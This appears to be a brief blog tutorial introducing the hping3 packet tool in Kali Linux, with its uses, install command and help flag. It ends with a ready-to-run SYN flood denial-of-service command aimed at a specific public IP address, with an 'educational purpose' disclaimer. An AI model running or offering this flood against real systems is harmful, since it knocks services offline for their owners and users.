hping3 - A Kali Linux Tool
hping3 is a command-line oriented TCP/IP packet assembler/analyzer. It's also a good informational tool to learn TCP/IP.
Using hping3 we can :
- Test firewall rules
- Advanced port scanning
- Used by students that are learning TCP/IP
Installation
hping3 comes pre-installed in both Kali Linux and Parrot OS.
sudo apt-get install hping3
Usage
hping3 --helpPerforming simple DOS attack
sudo hping3 -S --flood -V -p 80 209.85.255.255This information is only for educational purpose and we are not responsible for any kind of illegal activity done by this tool.
Check out similar tools HERE.
Hope you have enjoyed reading this.
Leave a comment below
Leave a comment below


Comments
Post a Comment